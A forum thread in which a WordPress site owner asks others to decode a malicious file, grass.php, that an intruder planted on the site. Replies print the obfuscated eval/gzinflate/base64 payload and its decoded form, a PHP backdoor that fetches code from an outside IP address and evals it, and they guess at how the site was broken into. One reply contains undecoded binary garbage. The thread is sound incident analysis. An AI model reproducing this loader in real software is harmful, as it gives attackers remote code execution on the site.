Translate this hackers code

A hacker managed to get a page added onto the root of one of my wordpress sites (not sure how yet)

He added a page called grass.php when you put a parameter in the url
grass.php?p=9-6559 it seems to call up a page from another site and display it on my site under that URL

This is the code. It appears to be compressed. Can anyone uncompress this code so I can see what he is doing and the site he is getting his info from?
{eval(gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ==')));}?>

 

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://78.109.23.240/dynuni5/?p=".trim($_GET['p'])."&sn=".urlencode($_SERVER['SERVER_NAME']));
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);

$data=curl_exec($ch);
curl_close($ch);
eval(base64_decode($data));
exit;

PHP:

Note sure what this returns, but the eval could allow it to execute just about any php command.

 

If you want to be able to figure these out, just follow all the steps except and eval function.

<?php 

$string = gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ=='));

?>

<textarea><?php echo $string; ?></textarea>

PHP:

 

Very simple. replace evaluation with print and jobs done, here is hte code

$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://78.109.23.240/dynuni5/?p=".trim($_GET['p'])."&sn=".urlencode($_SERVER['SERVER_NAME']));curl_setopt($ch, CURLOPT_POST, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);$data=curl_exec($ch);curl_close($ch);eval(base64_decode($data));exit;


I hope it helps you solve the issue. Besides show me your site and user input pages, I may look into. Your script might have some security holes.

 

Yes that helps thanks

I'm just using wordpress on www.thedigitaldomain.com

This is a windows server not a linux server. I'm wondering if a loophole was caused by php on a windows server. This is the only site I have ever done that on, I've never had any problem with this version of wordpress on linux servers

 

It's hard to say how that got there. I would check for things like anonymous ftp, or directories/scripts with full permissions that aren't escaping user input.

It takes a fairly big hole to put a script like this on a site. Very unlikely it was xss. Was this pulled from a database, or did you find it hard coded? Also, many times plugin creators put these in their plugins to track or put a link to their site on a blog. Was this in a specific plugin?

 

Scary part was this was an actual page on the root of this domain, Not just something in the database. or in the plugin folder

 

googleing grass.php?p=9-6559 comes up with other sites that must have been hacked into at one time

 

grass.php seems to be the culprit then. Where does this file reside ? within root of the wordpress blog?
I never touched wordpress but as per the hacker's code s/he has injected code someway through querystirng.

Second good guess may be uploading feature enabled in your blog where script might be recognizing image uploads using getiamgesize and fake files have been uploaded with GIF98a signature and rest of php code. Once a user is able to upload such thing and can get to uploaded path, s/he gets hold of everything.

See if there was some patch for worpress was released in near dates, and/or you might not have updated wordpress since long.

All of this is just a good guess.

regards

 

I had something like that happen to one of my sites once. I read into it and found out that some Chinese hacking gang was the culprit. Weird, huh? I think it was a hole in my version of WordPress.

 

Decodes to:

}�]��@���"r4�վO�D��Ic]��Xlp�V�-�ߟ-��j����[(D�~+�TR���'o@W�vmQxh�ҿ��� �
���Oq?���F����]ɱ��C뛼�6�vrj����O�L���Uf�z$�䴑G�=1d��C�0%,���(��~�v{��pb�<�Y�a� �M~���hkxd�{���x�o���R/�

 

Most likely doesn't help

 

Seems like the best guess is a hole in my wordpress script. I'll move up to the latest version later today.

Thanks for everyones input.